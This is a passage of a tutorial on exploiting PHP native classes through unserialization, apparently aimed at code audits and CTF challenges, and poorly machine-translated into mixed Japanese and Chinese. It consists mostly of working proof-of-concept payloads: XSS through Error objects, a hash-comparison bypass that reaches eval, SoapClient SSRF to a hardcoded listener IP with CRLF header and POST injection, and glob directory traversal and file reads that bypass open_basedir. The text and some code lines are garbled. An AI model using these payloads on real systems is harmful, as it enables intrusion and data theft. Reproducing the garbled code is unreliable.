この記事では、PHP に関する関連知識を提供します。主に逆シリアル化されたネイティブ クラスの使用方法を紹介します。コード監(jiān)査または ctf ポイントに逆シリアル化関數(shù)があるものの、完全なポップ チェーンを構(gòu)築できない場合は、では、この狀況をどのように打開すべきでしょうか? それでは、皆さんのお役に立てれば幸いです。

#推奨される調(diào)査: 「

PHP ビデオ チュートリアル 」

PHP 逆シリアル化ネイティブ クラスの使用の簡単な分析

code Audit や ctf にデシリアライズ機能があるものの、完全なポップチェーンを構(gòu)築できない場合、どうやって狀況を打開すればよいでしょうか? PHP ネイティブ クラスから始めてみましょう。一部の PHP ネイティブ クラスには、いくつかの組み込みマジック メソッドがあります。制御可能なパラメータを巧みに構(gòu)築し、組み込みのマジック メソッドをトリガーして使用すれば、必要な目標のいくつかを達成することができます。 。

1. 一般的なマジック メソッド

__wakeup()?//執(zhí)行unserialize()時，先會調(diào)用這個函數(shù)
__sleep()?//執(zhí)行serialize()時，先會調(diào)用這個函數(shù)
__destruct()?//對象被銷毀時觸發(fā)
__call()?//在對象上下文中調(diào)用不可訪問的方法時觸發(fā)
__callStatic()?//在靜態(tài)上下文中調(diào)用不可訪問的方法時觸發(fā)
__get()?//用于從不可訪問的屬性讀取數(shù)據(jù)或者不存在這個鍵都會調(diào)用此方法
__set()?//用于將數(shù)據(jù)寫入不可訪問的屬性
__isset()?//在不可訪問的屬性上調(diào)用isset()或empty()觸發(fā)
__unset()?//在不可訪問的屬性上使用unset()時觸發(fā)
__toString()?//把對象當作字符串使用時觸發(fā)
__invoke()?//當嘗試將對象調(diào)用為函數(shù)時觸發(fā)

2. ネイティブ クラスのマジック メソッド

次のスクリプトを使用してトラバースします。すべてのネイティブ クラスの it Magic メソッド

<?php $classes = get_declared_classes();foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            &#39;__destruct&#39;,
            &#39;__toString&#39;,
            &#39;__wakeup&#39;,
            &#39;__call&#39;,
            &#39;__callStatic&#39;,
            &#39;__get&#39;,
            &#39;__set&#39;,
            &#39;__isset&#39;,
            &#39;__unset&#39;,
            &#39;__invoke&#39;,
            &#39;__set_state&#39;
        ))) {
            print $class . &#39;::&#39; . $method . "\n";
        }
    }}

3. いくつかの一般的なネイティブ クラスの使用

エラー/例外

エラーすべての PHP 內(nèi)部エラー クラスの基本クラスです。 (PHP 7, 8)

**Error::__toString ** エラーの文字列式

エラーの文字列式を返します。

Exception は、すべてのユーザーレベルの例外の基本クラスです。 (PHP 5, 7, 8)

**Exception::__toString ** 例外オブジェクトを文字列に変換する

例外を文字列 (string) 型に変換して返します。

#クラス屬性

message エラーメッセージの內(nèi)容
code エラーコード
file エラーをスローするファイル名
#line エラーをスローする行數(shù)
# #XSS

__toString メソッドは、入力したパラメータを含むエラーまたは例外の文字列形式を返します。xss コードの文字列を構(gòu)築し、それをエコー レンダリングと組み合わせると、xss の脆弱性が反映されます。トリガーされる

例:

<?php $a = unserialize($_GET[&#39;a&#39;]);echo $a;

POC:

<?php $a = new Error("<script>alert('xss')");$b?=?serialize($a);echo?urlencode($b);

#ハッシュ バイパス

Look最初に質(zhì)問してください #[2020 Geek Challenge]Greatphp

<?phperror_reporting (0);class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
???????????if(!preg_match("/\syc,?$match)){
???????????????eval($this->syc);
???????????}?else?{
???????????????die("Try?Hard?!!");
???????????}

????????}
????}}if?(isset($_GET['great'])){
????unserialize($_GET['great']);}?else?{
????highlight_file(__FILE__);}

2 つのハッシュの強力な比較をバイパスする必要があり、最終的に eval コードの実行を構(gòu)築する必要があります

明らかに通常のメソッドは機能しませんが、ネイティブ クラスを介してバイパスできます

同様に、md5() 関數(shù)と sha1() 関數(shù)がオブジェクトを処理するときに、__tostring メソッドが自動的に呼び出されます

最初に簡単に見てみましょう。出力

<?php $a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
$d=new Exception("payload",4);
echo $a."<br>";
echo?$b."<br>";
echo?$c."<br>";
echo?$d;

これら 2 つのネイティブ クラスによって返される情報は、次の點を除いてまったく同じであることがわかります。行番號 これを使用して、ハッシュ関數(shù)をバイパスすることができます 注意すべき點 はい、2 つの受信オブジェクトは同じ行に配置する必要があります

#したがって、簡単なテストを?qū)g行して次のことを見つけることができますこのメソッドを使用すると、ハッシュの強い (弱い) 関數(shù)の比較を回避できることがわかります。

<?php $a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
    echo &#39;$a不等于$b&#39;."\n";}if (md5($a)===md5($b)){
    echo "md5值相等\n";}if (sha1($a)===sha1($b)){
    echo "sha1值相等";}

これらの知識ポイントに基づいて、ペイロード

??<?phpclass  SYCLOVER {
	public $syc;
	public $lover;
	public function __wakeup(){
		if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
		???if(!preg_match("/\syc,?$match)){
			???eval($this->syc);
		???}?else?{
			???die("Try?Hard?!!");
		???}
		???
		}
	}}$str?=?"?>=include~".urldecode("%D0%99%93%9E%98")."?>";//兩次取反繞過正則$a=new?Error($str,1);
	$b=new?Error($str,2);
	$c?=?new?SYCLOVER();$c->syc?=?$a;$c->lover?=?$b;
	echo(urlencode(serialize($c)));?>

SoapClient#を簡単に構(gòu)築できます。

##SoapClient

は、Web サービスにアクセスするために特別に使用されるクラスです。SOAP プロトコルに基づいて Web サービスにアクセスする PHP クライアントを提供できます。SOAP データ メッセージを作成し、wsdl インターフェイスと対話できます。 .

soap 拡張モジュールはデフォルトで閉じられており、使用する場合は手動でオンにする必要があります

SoapClient::__call - SOAP 関數(shù)を呼び出す (PHP 5、7) , 8)

通常、SOAP 関數(shù)は SoapClient オブジェクトのメソッドとして呼び出すことができます

SSRF

コンストラクター:

public?SoapClient?::?SoapClient(mixed?$wsdl?[，array?$options?])
第一個參數(shù)是用來指明是否是wsdl模式，如果為`null`，那就是非wsdl模式。
第二個參數(shù)為一個數(shù)組，如果在wsdl模式下，此參數(shù)可選；如果在非wsdl模式下，則必須設置location和uri選項，其中l(wèi)ocation是要將請求發(fā)送到的SOAP服務器的URL，而uri?是SOAP服務的目標命名空間。

soap とは

SOAP?是基于?XML?的簡易協(xié)議，是用在分散或分布的環(huán)境中交換信息的簡單的協(xié)議，可使應用程序在?HTTP?之上進行信息交換
SOAP是webService三要素（SOAP、WSDL、UDDI）之一：WSDL?用來描述如何訪問具體的接口，?UDDI用來管理，分發(fā)，查詢webService?，SOAP（簡單對象訪問協(xié)議）是連接或Web服務或客戶端和Web服務之間的接口。
其采用HTTP作為底層通訊協(xié)議，XML作為數(shù)據(jù)傳送的格式。

ペイロードを構(gòu)築します。最初のパラメーターは NULL で、2 番目のパラメーターの場所は vps アドレス

<?php $a = new SoapClient(null, array(
&#39;location&#39; =>?'http://47.102.146.95:2333',?
'uri'?=>'uri',
'user_agent'=>'111111'));
$b?=?serialize($a);
echo?$b;
$c?=?unserialize($b);
$c->a();

vps の 2333 ポートをリッスンします。以下の図に示すように、SSRF が正常にトリガーされ、vps はリクエスト情報を受け取ります。

# 、SOAPAction と user_agent の両方が制御可能であることがわかります

ローカル テスト中に、この組み込みクラス (つまり SOAP プロトコル) を使用してサービスが存在するポートを要求すると、エラーがすぐに報告され、サービスが存在しない (空いている) ポートにアクセスするとエラーが報告されることが判明しました。時間エラー レポートを使用して、イントラネット資産を検出できます。

CRLF 脆弱性に協(xié)力する場合は、SoapClient を使用して他のパラメーターを制御したり、データを送信するためにポストしたりすることもできます。例: Redis を攻撃する HTTP プロトコル

CRLF 知識の拡張

HTTP報文的結(jié)構(gòu)：狀態(tài)行和首部中的每行以CRLF結(jié)束，首部與主體之間由一空行分隔。
CRLF注入漏洞，是因為Web應用沒有對用戶輸入做嚴格驗證，導致攻擊者可以輸入一些惡意字符。
攻擊者一旦向請求行或首部中的字段注入惡意的CRLF(\r\n)，就能注入一些首部字段或報文主體，并在響應中輸出。

CRLF を組み合わせることで、SoapClient CRLF を使用して、カスタム Cookie の挿入など、より多くのことを行うことができます,

<?php $a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nCookie:?PHPSESSION=dasdasd564d6as4d6a"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

發(fā)送POST的數(shù)據(jù)包，這里需要將Content-Type設置為application/x-www-form-urlencoded，我們可以通過添加兩個\r\n來將原來的Content-Type擠下去，自定義一個新的Content-Type

<?php $a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nContent-Type:?application/x-www-form-urlencoded\r\nX-Forwarded-For:?127.0.0.1\r\nCookie:?PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length:?10\r\n\r\npostdata"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

看一道ctfshow上的題，完美利用上述知識點

$xff?=?explode(',',?$_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip?=?array_pop($xff);?//獲取xff頭


if($ip!=='127.0.0.1'){
????die('error');
}else{
????$token?=?$_POST['token'];
????if($token=='ctfshow'){
????????file_put_contents('flag.txt',$flag);
????}
}

poc：

<?php $target = &#39;http://127.0.0.1/flag.php&#39;;
$post_string = &#39;token=ctfshow&#39;;
$b = new SoapClient(null,array(&#39;location&#39; =>?$target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type:?application/x-www-form-urlencoded'.'^^Content-Length:?'.(string)strlen($post_string).'^^^^'.$post_string,'uri'=>?"ssrf"));
$a?=?serialize($b);
$a?=?str_replace('^^',"\r\n",$a);
echo?urlencode($a);
?>

DirectoryIterator/FilesystemIterator

DirectoryIterator類提供了一個簡單的接口來查看文件系統(tǒng)目錄的內(nèi)容。

DirectoryIterator::__toString 獲取字符串形式的文件名 （PHP 5,7,8）

目錄遍歷

使用此內(nèi)置類的__toString方法結(jié)合glob或file協(xié)議，即可實現(xiàn)目錄遍歷

例如:

<?php $a = new DirectoryIterator("glob:///*");
foreach ($a as $b){
    echo $b.&#39;<br>';
}

FilesystemIterator繼承于DirectoryIterator，兩者作用和用法基本相同，區(qū)別為FilesystemIterator會顯示文件的完整路徑，而DirectoryIterator只顯示文件名

因為可以配合使用glob偽協(xié)議(查找匹配的文件路徑模式)，所以可以繞過open_basedir的限制

在php4.3以后使用了zend_class_unserialize_deny來禁止一些類的反序列化，很不幸的是這兩個原生類都在禁止名單當中

SplFileObject

SplFileObject 類為單個文件的信息提供了一個面向?qū)ο蟮母呒壗涌?/p>

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

文件讀取

SplFileObject::__toString — 以字符串形式返回文件的路徑

<?phphighlight_file (__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
    echo($a);
}*/

如果沒有遍歷的話只能讀取第一行，且受到open_basedir影響

SimpleXMLElement

解析XML 文檔中的元素。 （PHP 5、PHP 7、PHP 8）

SimpleXMLElement::__construct — 創(chuàng)建一個新的 SimpleXMLElement 對象

XXE

我們查看一下其參數(shù)：

根據(jù)官方文檔，發(fā)現(xiàn)當?shù)谌齻€參數(shù)為True時，即可實現(xiàn)遠程xml文件載入，第二個參數(shù)的常量值設置為2即可。

利用可參考賽題：[SUCTF 2018]Homework

ReflectionMethod

獲取注釋內(nèi)容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 獲取注釋內(nèi)容
由該原生類中的getDocComment方法可以訪問到注釋的內(nèi)容

同時可利用的原生類還有ZipArchive– 刪除文件等等，不在敘述

推薦學習：《PHP視頻教程》

以上がPHP のネイティブ クラスの逆シリアル化についての深い理解の詳細內(nèi)容です。詳細については、PHP 中國語 Web サイトの他の関連記事を參照してください。